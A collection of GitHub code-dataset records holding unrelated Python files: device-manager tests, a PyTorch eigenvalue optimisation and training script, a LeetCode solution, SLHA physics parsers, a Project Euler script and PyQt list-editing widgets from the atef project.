'nt':\n raise unittest.SkipTest\n\n def test_SetupDiGetClassDevs(self):\n from .functions import SetupDiGetClassDevs\n from .constants import SCSIADAPTER_GUID_STRING\n result = SetupDiGetClassDevs(SCSIADAPTER_GUID_STRING)\n\n def test_SetupDiEnumDeviceInfo(self):\n from .functions import SetupDiGetClassDevs, SetupDiEnumDeviceInfo\n devinfo_list = [info for info in SetupDiEnumDeviceInfo(SetupDiGetClassDevs())]\n self.assertGreater(len(devinfo_list), 0)\n\n def test_SetupDiGetDevicePropertyKeys(self):\n from .functions import SetupDiGetClassDevs, SetupDiEnumDeviceInfo, SetupDiGetDevicePropertyKeys\n device_info_set = SetupDiGetClassDevs()\n dev_info_data_list = [info for info in SetupDiEnumDeviceInfo(device_info_set)]\n property_keys = SetupDiGetDevicePropertyKeys(device_info_set, dev_info_data_list[10])\n self.assertGreater(len(property_keys), 0)\n\n def test_SetupdiGetDeviceProperty__string(self):\n from .functions import SetupDiGetClassDevs, SetupDiEnumDeviceInfo\n from .functions import SetupDiGetDevicePropertyKeys, SetupDiGetDeviceProperty\n device_info_set = SetupDiGetClassDevs()\n dev_info_data_list = [info for info in SetupDiEnumDeviceInfo(device_info_set)]\n property_keys = SetupDiGetDevicePropertyKeys(device_info_set, dev_info_data_list[10])\n property = SetupDiGetDeviceProperty(device_info_set, dev_info_data_list[10], property_keys[0])\n value = property.python_object\n\n def test_SetupdiGetDeviceProperty__all_found(self):\n from .functions import SetupDiGetClassDevs, SetupDiEnumDeviceInfo\n from .functions import SetupDiGetDevicePropertyKeys, SetupDiGetDeviceProperty\n device_info_set = SetupDiGetClassDevs()\n for devinfo in SetupDiEnumDeviceInfo(device_info_set):\n for key in SetupDiGetDevicePropertyKeys(device_info_set, devinfo):\n log.debug(key)\n property = SetupDiGetDeviceProperty(device_info_set, devinfo, key)\n value = property.python_object\n","repo_name":"Infinidat/infi.devicemanager","sub_path":"src/infi/devicemanager/setupapi/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2860,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"57"} +{"seq_id":"22384618602","text":"import numpy as np\nimport numpy.linalg\nimport torch\nfrom scipy.sparse import eye, kron, vstack, diags\nfrom scipy.sparse.linalg import eigsh\nimport random\n\n## Données initiales\n\n#Taille du domaine entier\nw = 32\n\n# Nombre d'itération\niter_num = 21\n\n# Fournit les coordonnées du centre du domaine\na = w/2\n\n#Demi-longueur du rectangle, qui restera constante\nLongueur = 3*a/4\n\nnumpy.save(f\"donnees_init.npy\",np.array([w,iter_num,Longueur]))\n\n## Création de la matrice d'incidence\nx = eye(w-1,w,1) - eye(w-1,w)\ny = eye(w-1,w,1) - eye(w-1,w)\nB = vstack([kron(eye(w),x),kron(y,eye(w))])\nB = torch.from_numpy(B.toarray())\n\n## Etape de création du rectangle\n\n# Construction du tableau initial\ninit_table = a*torch.ones((w,w))\ny = w//2\nfor i in range(w):\n for j in range(w):\n if abs(j-y)<Longueur:\n init_table[i,j]=abs(i-y)\n\n# Fonction d'activation\nsigma = lambda x : 1/(1+torch.exp(-10*x))\n\n# Construction du rectangle dans le domaine: l est la demi-largeur du rectangle, c'est l qu'on optimise.\nrect = lambda l : sigma(l-init_table)\n\n\n## Fonction de coût\ndef loss_fun(l) :\n # Construction du laplacien\n BM = B @ torch.diag(rect(l).flatten().double())\n L = - BM.t() @ BM\n\n # récupération des éléments propres\n U,S,V = torch.svd(-L)\n S_f = S[S>1e-5]\n\n return (4 - S_f[-2]/S_f[-1])**2 + (9 - S_f[-3]/S_f[-1])**2 + torch.max(torch.relu(-l),torch.relu(l-a))\n\n\n## Fonction de recherche du pas\ndef backtracking_line_search(y,p):\n #alpha = 1/4\n #beta = 1/2\n #t=1\n #while loss_fun(y-t*p) > loss_fun(y) - alpha * t * p.norm() :\n # t = beta * t\n return 1\n\n## Initialisation de la descente de gradient\n\n# On prend l aléatoire entre 0 et la demi-largeur du domaine entier\nl=np.array(a*random.random())\nnumpy.save(f\"param_-1.npy\",l)\nl = torch.from_numpy(l)\nl.requires_grad = True\n\n# Initialisation des listes d'enregistrement des données\nI = []\nloss_tab = []\nPartiel1 = []\nPartiel2 = []\nfondamental = []\n\n## Descente\nfor i in range(iter_num):\n # forward pass\n loss = loss_fun(l)\n\n # backward pass\n loss.backward()\n grad_l = l.grad\n\n # Maj du pas\n learning_rate = backtracking_line_search(l,grad_l)\n with torch.no_grad():\n l -= grad_l * learning_rate\n l.grad.zero_()\n\n # Calcul de données pour l'affichage\n BM = B @ torch.diag(rect(l).flatten().double())\n L = - BM.t() @ BM\n U,S,V = torch.svd(-L)\n S_f = S[S>1e-5].detach().numpy().tolist()\n Partiel1.append(S_f[-2]/S_f[-1])\n Partiel2.append(S_f[-3]/S_f[-1])\n loss_tab.append(loss.detach().numpy().tolist())\n fondamental.append(S_f[-1])\n I.append(i)\n\n # Enregistrement régulier des données\n if i%10 == 0:\n numpy.save(f\"iteration_num_{i}.npy\", np.array(I))\n numpy.save(f\"loss_tab_num_{i}.npy\", np.array(loss_tab))\n numpy.save(f\"partiel1_num_{i}.npy\", np.array(Partiel1))\n numpy.save(f\"partiel2_num_{i}.npy\", np.array(Partiel2))\n numpy.save(f\"param_{i}.npy\", l.detach().numpy())\n numpy.save(f\"fondamental_num_{i}.npy\", np.array(fondamental))\n","repo_name":"centreborelli/stage-octaves","sub_path":"doc/opti_para/code_serveur.py","file_name":"code_serveur.py","file_ext":"py","file_size_in_byte":3087,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"31176512383","text":"#!usr/bin/env python3\r\n#-*- coding=utf-8 -*-\r\n#python=3.6 pytorch=1.2.0\r\n\r\n\r\nimport os\r\nimport random\r\nimport cv2\r\nimport numpy as np\r\nimport torch\r\nimport torch.nn.functional as F\r\nfrom tensorboardX import SummaryWriter\r\nfrom easydict import EasyDict as edict\r\nfrom random import randint\r\nimport torchvision\r\nimport torchvision.transforms as transforms\r\n\r\nimport time\r\n\r\nfrom network_factory import get_network\r\nfrom opt_factory import get_opt\r\nfrom loss_factory import get_loss_func\r\nfrom datasets.loader_factory import get_loader\r\nfrom test import val\r\nfrom utils import CalculateAcc,SelfData,load_cfg,model_complexity,plot_result_data,\\\r\n load_checkpoints,print_to_screen,save_checkpoints\r\n\r\n\r\ndef fix_random_seed(cfg):\r\n random.seed(cfg.DETERMINISTIC.SEED)\r\n torch.manual_seed(cfg.DETERMINISTIC.SEED)\r\n torch.cuda.manual_seed(cfg.DETERMINISTIC.SEED)\r\n torch.backends.cudnn.deterministic = cfg.DETERMINISTIC.CUDNN\r\n np.random.seed(cfg.DETERMINISTIC.SEED)\r\n\r\n\r\ndef trainer(cfg):\r\n logger = load_cfg(cfg) \r\n fix_random_seed(cfg) \r\n \r\n train_loader = get_loader(cfg.DATASET_TRPE, cfg.PATH.DATA, 'train', label_path=cfg.PATH.LABEL, cfg=cfg.TRAIN, logger=logger)\r\n val_loader = get_loader(cfg.DATASET_TRPE, cfg.PATH.EVAL, 'eval',label_path=cfg.PATH.LABEL, cfg=cfg.TRAIN, logger=logger)\r\n its_num = len(train_loader)\r\n # from torchvision import models\r\n # import torch.nn as nn\r\n # class ResNet(nn.Module):\r\n # def __init__(self, pre_trained=True, n_class=200, model_choice=50):\r\n # super(ResNet, self).__init__()\r\n # self.n_class = n_class\r\n # self.base_model = self._model_choice(pre_trained, model_choice)\r\n # self.base_model.avgpool = nn.AdaptiveAvgPool2d((1,1))\r\n # self.base_model.fc = nn.Linear(512*4, n_class)\r\n # #self.base_model.fc.apply(weight_init_kaiming)\r\n\r\n # def forward(self, x):\r\n # N = x.size(0)\r\n # assert x.size() == (N, 3, 224, 224)\r\n # x = self.base_model(x)\r\n # assert x.size() == (N, self.n_class)\r\n # return x\r\n\r\n # def _model_choice(self, pre_trained, model_choice):\r\n # if model_choice == 50:\r\n # return models.resnet50(pretrained=pre_trained)\r\n # elif model_choice == 101:\r\n # return models.resnet101(pretrained=pre_trained)\r\n # elif model_choice == 152:\r\n # return models.resnet152(pretrained=pre_trained)\r\n\r\n model = get_network(cfg.MODEL.NAME, cfg=cfg.MODEL, logger=logger)\r\n model = torch.nn.DataParallel(model, cfg.GPUS).cuda() if torch.cuda.is_available() else model\r\n model_complexity(model,cfg,logger)\r\n\r\n cfg.TRAIN.LR_REDUCE = [int(its_num*x) for x in cfg.TRAIN.LR_REDUCE]\r\n opt_t,lr_scheduler_t = get_opt(model, cfg.TRAIN, logger, \r\n its_total=(cfg.TRAIN.EPOCHS-cfg.TRAIN.WARMUP)*its_num)\r\n if cfg.TRAIN.WARMUP != 0:\r\n warm_opt, warm_scheduler = get_opt(model, cfg.TRAIN, logger, \r\n is_warm=True, its_total=cfg.TRAIN.WARMUP*its_num)\r\n loss_func = get_loss_func(cfg.MODEL.LOSS, logger=logger)\r\n\r\n current_epoch = load_checkpoints(model, opt_t, cfg.PATH , logger, lr_scheduler_t)\r\n log_writter = SummaryWriter(cfg.PATH.EXPS+cfg.PATH.NAME)\r\n \r\n acc_total = []\r\n acc_val_total = []\r\n loss_total = []\r\n losss_val_total = []\r\n best_val = [0,0]\r\n \r\n for epoch in range(current_epoch, cfg.TRAIN.EPOCHS):\r\n start_time = time.time()\r\n if epoch < cfg.TRAIN.WARMUP:\r\n opt = warm_opt\r\n lr_scheduler = warm_scheduler\r\n else:\r\n opt = opt_t\r\n lr_scheduler = lr_scheduler_t\r\n\r\n acc_train_class = CalculateAcc()\r\n loss_train_calss = SelfData()\r\n model.train()\r\n data_begin = time.time()\r\n for its, (imgs, targets)in enumerate(train_loader):\r\n data_time = time.time()-data_begin\r\n imgs = imgs.cuda() if torch.cuda.is_available() else imgs\r\n targets = targets.cuda() if torch.cuda.is_available() else targets\r\n \r\n \r\n opt.zero_grad()\r\n outputs = model(imgs)\r\n loss = loss_func(outputs,targets)\r\n loss.backward()\r\n opt.step()\r\n lr_scheduler.step()\r\n \r\n loss_train_calss.add_value(loss.cpu())\r\n train_time = time.time()-(data_time+data_begin)\r\n data_begin = time.time()\r\n lr = opt.param_groups[0]['lr']\r\n mem = torch.cuda.memory_cached() / 1E9 if torch.cuda.is_available() else 0\r\n acc_train_class.add_value(outputs.cpu(), targets.cpu())\r\n if its % cfg.PRINT_FRE == 0:\r\n print_to_screen(loss, lr, its, epoch, its_num, logger, \r\n data_time,train_time,mem,acc_train_class.print_())\r\n \r\n if cfg.SHORT_TEST == True:\r\n if its == 20:\r\n break\r\n\r\n save_checkpoints(cfg.PATH.EXPS+cfg.PATH.NAME+cfg.PATH.MODEL, model, opt, epoch,lr_scheduler)\r\n acc_val, loss_val = val(val_loader, model, logger, loss_func, epoch, print_fre=cfg.PRINT_FRE,)\r\n log_writter.add_scalars(\"acc\",{'acc_train':acc_train_class.print_(),\r\n 'acc_val':acc_val,},\r\n epoch)\r\n acc_total.append(acc_train_class.print_())\r\n acc_val_total.append(acc_val)\r\n loss_total.append(loss_train_calss.avg())\r\n losss_val_total.append(loss_val)\r\n end_time = time.time()-start_time\r\n logger.info('Train Prec@1:%.4f\\t'%(acc_train_class.print_())+'Val Prec@1:%.4f\\t'%(acc_val)+'Epoch Time:%.2fmin'%(end_time/60))\r\n if best_val[0] < acc_val:\r\n best_val[0] = acc_val\r\n best_val[1] = epoch\r\n save_checkpoints(cfg.PATH.EXPS+cfg.PATH.NAME+cfg.PATH.BESTMODEL, model, opt, epoch,lr_scheduler)\r\n logger.info('BestV Prec@1:%.4f\\t'%(best_val[0])+\"Best Epoch:%d\"%(best_val[1]))\r\n\r\n plot_result_data(acc_total,acc_val_total,loss_total,\r\n losss_val_total,cfg.PATH.EXPS+cfg.PATH.NAME, cfg.TRAIN.EPOCHS)\r\n log_writter.close()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n from config_cub import cfg\r\n trainer(cfg) ","repo_name":"H-Liu1997/Pytorch-Networks","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6301,"program_lang":"python","lang":"en","doc_type":"code","stars":121,"dataset":"github-code","pt":"57"} +{"seq_id":"19871833046","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def longestUnivaluePath(self, root: Optional[TreeNode]) -> int:\n ans = []\n\n def find(root, prev, diameter):\n if not root:\n return 0\n\n if root.val != prev:\n find(root, root.val, 0)\n return 0\n\n left = find(root.left, root.val, diameter)\n right = find(root.right, root.val, diameter)\n\n diameter = max(left + right, diameter)\n ans.append(diameter)\n\n return max(left, right) + 1\n\n if not root:\n return 0\n find(root, root.val, 0)\n return max(ans)\n","repo_name":"codesquad-backend-study/algorithm-study","sub_path":"programmers/Hyun/week21/687.py","file_name":"687.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"9305071821","text":"\"\"\"\nA few common methods for extracting particle properties from SLHA spectrum and decay files\n\"\"\"\n__author__ = \"Pieter David <pieter.david@cern.ch>\"\n__date__ = \"2013-08-28\"\n\ndef getTotalWidthFromSLHA( slhaFileName, particle ):\n \"\"\"\n Extract the total width (in GeV) of particle from the decay table in the SLHA file\n \"\"\"\n W = 0.\n with open(slhaFileName, \"read\") as spcFile:\n for ln in spcFile:\n if \"DECAY\" in ln.upper() and particle in ln:\n tokens = ln.strip().split()\n if len(tokens) >= 3:\n W = float(tokens[2])\n return W\n\ndef getMassesFromSLHA( slhaFileName ):\n \"\"\"\n Collect all masses (in GeV) from a SLHA file\n\n Return: { str(pid) : mass }\n \"\"\"\n inMassBlock = False\n masses = dict()\n with open(slhaFileName, \"read\") as spcFile:\n for ln in spcFile:\n if not ln.strip().startswith(\"#\"):\n if inMassBlock:\n if ln.upper().startswith(\"BLOCK\"): ## check if the block ended\n inMassBlock = False\n else:\n tokens = ln.strip().split()\n masses[tokens[0]] = float(tokens[1])\n elif ln.strip().upper().startswith(\"BLOCK\") and ln.strip().split()[1].upper() == \"MASS\":\n inMassBlock = True\n return masses\n\ndef getParticlePropertiesAndPythia8Commands(spcFileName, partNames):\n \"\"\"\n Extract mass and width for particles in partNames from filename\n\n Returns: { str(pid) : ( mass[GeV] , tau[s] ) }, [ pythia8 tau0 commands ]\n \"\"\"\n import os.path\n slhaFileName = os.path.expandvars(spcFileName)\n try:\n from pyslha import readSLHAFile\n blocks, decays = readSLHAFile(slhaFileName)\n massesAndWidthsInGeV = dict( (part, ( blocks[\"MASS\"][int(part)] , decays[int(part)].totalwidth) ) for part in partNames )\n except:\n massesInGeV = getMassesFromSLHA(slhaFileName)\n massesAndWidthsInGeV = dict( (part, ( massesInGeV.get(part) , getTotalWidthFromSLHA(slhaFileName, part)) ) for part in partNames )\n from GaudiKernel import SystemOfUnits as units\n from GaudiKernel import PhysicalConstants as constants\n pps = dict()\n pythiaCommands = list()\n for part in partNames:\n massInGeV, widthInGeV = massesAndWidthsInGeV[part]\n pps[part] = ( massInGeV, constants.hbar_Planck / ( widthInGeV*units.GeV ) / units.second) # (mass [GeV], lifetime [s])\n pythiaCommands.append(\"%s:tau0 = %e\" % ( part , constants.hbarc / ( widthInGeV*units.GeV ) / units.mm ) ) # lifetime in mm/c\n return pps, pythiaCommands\n","repo_name":"Sally27/backup_cmtuser_full","sub_path":"Gauss_v45r9/Gen/DecFiles/scripts/SuSySLHAFunctions.py","file_name":"SuSySLHAFunctions.py","file_ext":"py","file_size_in_byte":2641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"11314305515","text":"#!/usr/bin/env python3\nimport numpy as np\nimport random\n\n# B. Euler Probem 16: Largest Prime Factor\ndef power_sum():\n\tnum=str(2**1000)\n\tblah=[]\n\tfor aa in range(0,len(num)):\n\t\tblah.append(int(num[aa]))\n\tans=sum(blah)\n\tprint(ans)\npower_sum()\n","repo_name":"dcreamer/eulerproblems","sub_path":"euler_problem_16.py","file_name":"euler_problem_16.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"1082704840","text":"from __future__ import annotations\n\nimport asyncio\nimport dataclasses\nimport logging\nimport time\nfrom dataclasses import fields\nfrom enum import IntEnum\nfrom itertools import zip_longest\nfrom typing import (Any, Callable, ClassVar, Dict, List, Optional, Tuple, Type,\n Union)\n\nimport numpy as np\nimport qtawesome as qta\nfrom ophyd import EpicsSignal, EpicsSignalRO\nfrom pcdsutils.qt.callbacks import WeakPartialMethodSlot\nfrom qtpy import QtCore, QtWidgets\nfrom qtpy.QtCore import (QPoint, QPointF, QRect, QRectF, QRegularExpression,\n QSize, Qt, QTimer)\nfrom qtpy.QtCore import Signal as QSignal\nfrom qtpy.QtGui import (QBrush, QClipboard, QColor, QGuiApplication, QPainter,\n QPaintEvent, QPen, QRegularExpressionValidator,\n QValidator)\nfrom qtpy.QtWidgets import (QCheckBox, QComboBox, QDoubleSpinBox, QInputDialog,\n QLabel, QLayout, QLineEdit, QMenu, QPushButton,\n QSizePolicy, QSpinBox, QStyle, QToolButton,\n QWidget)\n\nfrom atef import util\nfrom atef.cache import DataCache, get_signal_cache\nfrom atef.check import Comparison, EpicsValue, Equals, HappiValue, Range\nfrom atef.config import (Configuration, DeviceConfiguration,\n PreparedComparison, PreparedConfiguration,\n PreparedFile, PVConfiguration, ToolConfiguration)\nfrom atef.enums import Severity\nfrom atef.exceptions import DynamicValueError, MissingHappiDeviceError\nfrom atef.procedure import (ProcedureFile, ProcedureStep, SetValueStep,\n walk_steps)\nfrom atef.qt_helpers import (QDataclassBridge, QDataclassList, QDataclassValue,\n ThreadWorker)\nfrom atef.result import combine_results, incomplete_result\nfrom atef.tools import Ping\nfrom atef.type_hints import Number\nfrom atef.widgets.archive_viewer import get_archive_viewer\nfrom atef.widgets.core import DesignerDisplay\nfrom atef.widgets.happi import HappiDeviceComponentWidget\nfrom atef.widgets.ophyd import OphydAttributeData, OphydAttributeDataSummary\nfrom atef.widgets.utils import (BusyCursorThread, PV_validator,\n match_line_edit_text_width)\n\nlogger = logging.getLogger(__name__)\n\n\nclass StringListWithDialog(DesignerDisplay, QWidget):\n \"\"\"\n A widget used to modify the str variant of QDataclassList, tied to a\n specific dialog that helps with selection of strings.\n\n The ``item_add_request`` signal must be hooked into with the\n caller-specific dialog tool. This class may be subclassed to add this\n functionality.\n\n Parameters\n ----------\n data_list : QDataclassList\n The dataclass list to edit using this widget.\n\n allow_duplicates : bool, optional\n Allow duplicate entries in the list. Defaults to False.\n \"\"\"\n filename: ClassVar[str] = \"string_list_with_dialog.ui\"\n item_add_request: ClassVar[QSignal] = QSignal()\n item_edit_request: ClassVar[QSignal] = QSignal(list) # List[str]\n\n button_add: QtWidgets.QToolButton\n button_layout: QtWidgets.QVBoxLayout\n button_remove: QtWidgets.QToolButton\n list_strings: QtWidgets.QListWidget\n\n def __init__(\n self,\n data_list: QDataclassList,\n allow_duplicates: bool = False,\n *args,\n **kwargs,\n ):\n super().__init__(*args, **kwargs)\n self.data_list = data_list\n self.allow_duplicates = allow_duplicates\n self._setup_ui()\n\n def _setup_ui(self) -> None:\n starting_list = self.data_list.get()\n for starting_value in starting_list or []:\n self._add_item(starting_value, init=True)\n\n self.setContextMenuPolicy(Qt.ContextMenuPolicy.CustomContextMenu)\n self.customContextMenuRequested.connect(self._show_context_menu)\n\n # def test():\n # text, success = QtWidgets.QInputDialog.getText(\n # self, \"Device name\", \"Device name?\"\n # )\n # if success:\n # self.add_items([item for item in text.strip().split() if item])\n\n self.button_add.clicked.connect(self.item_add_request.emit)\n self.button_remove.clicked.connect(self._remove_item_request)\n\n def _edit_item_request():\n self.item_edit_request.emit(self.selected_items_text)\n\n self.list_strings.doubleClicked.connect(_edit_item_request)\n\n def _add_item(self, item: str, *, init: bool = False):\n \"\"\"\n Add an item to the QListWidget and the bridge (if init is not set).\n\n Parameters\n ----------\n item : str\n The item to add.\n\n init : bool, optional\n Whether or not this is the initial initialization of this widget.\n This will be set to True in __init__ so that we don't mutate\n the underlying dataclass. False, the default, means that we're\n adding a new dataclass to the list, which means we should\n definitely append it.\n \"\"\"\n if not init:\n if not self.allow_duplicates and item in self.data_list.get():\n return\n\n self.data_list.append(item)\n\n self.list_strings.addItem(QtWidgets.QListWidgetItem(item))\n\n def add_items(self, items: List[str]) -> None:\n \"\"\"\n Add one or more strings to the QListWidget and the bridge.\n\n Parameters\n ----------\n item : list of str\n The item(s) to add.\n \"\"\"\n for item in items:\n self._add_item(item)\n\n @property\n def selected_items_text(self) -> List[str]:\n \"\"\"\n The text of item(s) currently selected in the QListWidget.\n\n Returns\n -------\n selected : list of str\n \"\"\"\n return [item.text() for item in list(self.list_strings.selectedItems())]\n\n def _remove_item_request(self):\n \"\"\"Qt hook: user requested item removal.\"\"\"\n for item in self.list_strings.selectedItems():\n self.data_list.remove_value(item.text())\n self.list_strings.takeItem(self.list_strings.row(item))\n\n def _remove_item(self, item: str) -> None:\n \"\"\"\n Remove an item from the QListWidget and the bridge.\n\n Parameters\n ----------\n items : str\n The item to remove.\n \"\"\"\n self.data_list.remove_value(item)\n for row in range(self.list_strings.count()):\n if self.list_strings.item(row).text() == item:\n self.list_strings.takeItem(row)\n return\n\n def remove_items(self, items: List[str]) -> None:\n \"\"\"\n Remove items from the QListWidget and the bridge.\n\n Parameters\n ----------\n items : list of str\n The items to remove.\n \"\"\"\n for item in items:\n self._remove_item(item)\n\n def _edit_item(self, old: str, new: str) -> None:\n \"\"\"\n Edit an item in place in the QListWidget and the bridge.\n\n If we don't allow duplicates and new already exists, we\n need to remove old instead.\n\n Parameters\n ----------\n old : str\n The original item to replace\n new : str\n The new item to replace it with\n \"\"\"\n if old == new:\n return\n if not self.allow_duplicates and new in self.data_list.get():\n return self._remove_item(old)\n self.data_list.put_to_index(\n index=self.data_list.get().index(old),\n new_value=new,\n )\n for row in range(self.list_strings.count()):\n if self.list_strings.item(row).text() == old:\n self.list_strings.item(row).setText(new)\n return\n\n def edit_items(self, old_items: List[str], new_items: List[str]) -> None:\n \"\"\"\n Best-effort edit of items in place in the QListWidget and the bridge.\n\n The goal is to replace each instance of old with each instance of\n new, in order.\n \"\"\"\n # Ignore items that exist in both lists\n old_uniques = [item for item in old_items if item not in new_items]\n new_uniques = [item for item in new_items if item not in old_items]\n # Remove items from new if duplicates aren't allowed and they exist\n if not self.allow_duplicates:\n new_uniques = [\n item for item in new_uniques if item not in self.data_list.get()\n ]\n # Add, remove, edit in place as necessary\n # This will edit everything in place if the lists are equal length\n # If old_uniques is longer, we'll remove when we exhaust new_uniques\n # If new_uniques is longer, we'll add when we exhaust old_uniques\n # TODO find a way to add these at the selected index\n for old, new in zip_longest(old_uniques, new_uniques, fillvalue=None):\n if old is None:\n self._add_item(new)\n elif new is None:\n self._remove_item(old)\n else:\n self._edit_item(old, new)\n\n def _show_context_menu(self, pos: QPoint) -> None:\n \"\"\"\n Displays a context menu that provides copy & remove actions\n to the user\n\n Parameters\n ----------\n pos : QPoint\n Position to display the menu at\n \"\"\"\n if len(self.list_strings.selectedItems()) <= 0:\n return\n\n menu = QMenu(self)\n\n def copy_selected():\n items = self.list_strings.selectedItems()\n text = '\\n'.join([x.text() for x in items])\n if len(text) > 0:\n QGuiApplication.clipboard().setText(text, QClipboard.Mode.Clipboard)\n\n copy = menu.addAction('&Copy')\n copy.triggered.connect(copy_selected)\n\n remove = menu.addAction('&Remove')\n remove.triggered.connect(self._remove_item_request)\n\n menu.exec(self.mapToGlobal(pos))\n\n\nclass DeviceListWidget(StringListWithDialog):\n \"\"\"\n Device list widget, with ``HappiSearchWidget`` for adding new devices.\n \"\"\"\n\n _search_widget: Optional[HappiDeviceComponentWidget] = None\n\n def _setup_ui(self) -> None:\n super()._setup_ui()\n self.item_add_request.connect(self._open_device_chooser)\n self.item_edit_request.connect(self._open_device_chooser)\n\n def _open_device_chooser(self, to_select: Optional[List[str]] = None) -> None:\n \"\"\"\n Hook: User requested adding/editing an existing device.\n\n Parameters\n ----------\n to_select : list of str, optional\n If provided, the device chooser will filter for these items.\n \"\"\"\n self._search_widget = HappiDeviceComponentWidget(\n client=util.get_happi_client(),\n show_device_components=False,\n )\n self._search_widget.item_search_widget.happi_items_chosen.connect(\n self.add_items\n )\n self._search_widget.show()\n self._search_widget.activateWindow()\n self._search_widget.item_search_widget.edit_filter.setText(\n util.regex_for_devices(to_select)\n )\n\n\nclass ComponentListWidget(StringListWithDialog):\n \"\"\"\n Component list widget using a ``HappiDeviceComponentWidget``.\n \"\"\"\n\n _search_widget: Optional[HappiDeviceComponentWidget] = None\n suggest_comparison: QSignal = QSignal(Comparison)\n get_device_list: Optional[Callable[[], List[str]]]\n\n def __init__(\n self,\n data_list: QDataclassList,\n get_device_list: Optional[Callable[[], List[str]]] = None,\n allow_duplicates: bool = False,\n **kwargs,\n ):\n self.get_device_list = get_device_list\n super().__init__(data_list=data_list, allow_duplicates=allow_duplicates, **kwargs)\n\n def _setup_ui(self) -> None:\n super()._setup_ui()\n self.item_add_request.connect(self._open_component_chooser)\n self.item_edit_request.connect(self._open_component_chooser)\n\n def _open_component_chooser(self, to_select: Optional[List[str]] = None) -> None:\n \"\"\"\n Hook: User requested adding/editing a component.\n\n Parameters\n ----------\n to_select : list of str, optional\n If provided, the device chooser will filter for these items.\n \"\"\"\n\n widget = HappiDeviceComponentWidget(\n client=util.get_happi_client()\n )\n widget.device_widget.custom_menu_helper = self._attr_menu_helper\n self._search_widget = widget\n # widget.item_search_widget.happi_items_chosen.connect(\n # self.add_items\n # )\n widget.show()\n widget.activateWindow()\n\n if self.get_device_list is not None:\n try:\n device_list = self.get_device_list()\n except Exception as ex:\n device_list = []\n logger.debug(\"Failed to get device list\", exc_info=ex)\n\n widget.item_search_widget.edit_filter.setText(\n util.regex_for_devices(device_list)\n )\n\n def _attr_menu_helper(self, data: List[OphydAttributeData]) -> QtWidgets.QMenu:\n menu = QtWidgets.QMenu()\n\n summary = OphydAttributeDataSummary.from_attr_data(*data)\n short_attrs = [datum.attr.split(\".\")[-1] for datum in data]\n\n def add_attrs():\n for datum in data:\n self._add_item(datum.attr)\n\n def add_without():\n add_attrs()\n\n def add_with_equals():\n add_attrs()\n comparison = Equals(\n name=f'{\"_\".join(short_attrs)}_auto',\n description=f'Comparison from: {\", \".join(short_attrs)}',\n value=summary.average,\n )\n self.suggest_comparison.emit(comparison)\n\n def add_with_range():\n add_attrs()\n comparison = Range(\n name=f'{\"_\".join(short_attrs)}_auto',\n description=f'Comparison from: {\", \".join(short_attrs)}',\n low=summary.minimum,\n high=summary.maximum,\n )\n self.suggest_comparison.emit(comparison)\n\n def open_arch_viewer():\n arch_widget = get_archive_viewer()\n for datum in data:\n try:\n parent_dev = (datum.signal.parent\n or datum.signal.biological_parent)\n dev_attr = '.'.join((parent_dev.name, datum.attr))\n except Exception as e:\n logger.debug('unable to resolve full device-attribute '\n f'string: {e}')\n dev_attr = 'N/A'\n arch_widget.add_signal(\n datum.pvname, dev_attr=dev_attr, update_curves=False\n )\n arch_widget.update_curves()\n arch_widget.show()\n\n menu.addSection(\"Open Archive Data viewer\")\n archive_viewer_all = menu.addAction(\"View all selected in \"\n \"Archive Viewer\")\n archive_viewer_all.triggered.connect(open_arch_viewer)\n\n menu.addSection(\"Add all selected\")\n add_without_action = menu.addAction(\"Add selected without comparison\")\n add_without_action.triggered.connect(add_without)\n\n if summary.average is not None:\n add_with_equals_action = menu.addAction(\n f\"Add selected with Equals comparison (={summary.average})\"\n )\n add_with_equals_action.triggered.connect(add_with_equals)\n\n if summary.minimum is not None:\n add_with_range_action = menu.addAction(\n f\"Add selected with Range comparison \"\n f\"[{summary.minimum}, {summary.maximum}]\"\n )\n add_with_range_action.triggered.connect(add_with_range)\n\n menu.addSection(\"Add single attribute\")\n for attr in data:\n def add_single_attr(*, attr_name: str = attr.attr):\n self._add_item(attr_name)\n\n action = menu.addAction(f\"Add {attr.attr}\")\n action.triggered.connect(add_single_attr)\n\n return menu\n\n\nclass BulkListWidget(StringListWithDialog):\n \"\"\"\n String list widget that uses a multi-line text box for entry and edit.\n \"\"\"\n\n def _setup_ui(self) -> None:\n super()._setup_ui()\n self.item_add_request.connect(self._open_multiline)\n self.item_edit_request.connect(self._open_multiline)\n\n def _open_multiline(self, to_select: Optional[List[str]] = None) -> None:\n \"\"\"\n User requested adding new strings or editing existing ones.\n\n Parameters\n ----------\n to_select : list of str, optional\n For editing, this will contain the string items that are\n selected so that we can pre-populate the edit box\n appropriately.\n \"\"\"\n to_select = to_select or []\n if to_select:\n title = 'Edit PVs Dialog'\n label = 'Add to or edit these PVs as appropriate:'\n text = '\\n'.join(to_select)\n else:\n title = 'Add PVs Dialog'\n label = 'Which PVs should be included?'\n text = ''\n user_input, ok = QInputDialog.getMultiLineText(\n self, title, label, text\n )\n if not ok:\n return\n new_pvs = [pv.strip() for pv in user_input.splitlines() if pv.strip()]\n self.edit_items(to_select, new_pvs)\n\n\nclass Toggle(QCheckBox):\n \"\"\"\n A checkbox widget that looks like a sliding toggle. At default:\n - The disabled state displays the slider as grey and to the left.\n - The activated state displays the slider as blue and to the right\n \"\"\"\n # shamelessly vendored from qtwidgets:\n # github.com/pythonguis/python-qtwidgets/tree/master/qtwidgets/toggle\n _transparent_pen = QPen(Qt.transparent)\n _light_grey_pen = QPen(Qt.lightGray)\n\n def __init__(\n self,\n *args,\n parent=None,\n bar_color=Qt.gray,\n checked_color=\"#00B0FF\",\n handle_color=Qt.white,\n checked_icon='msc.run-all',\n unchecked_icon='fa5s.edit',\n **kwargs\n 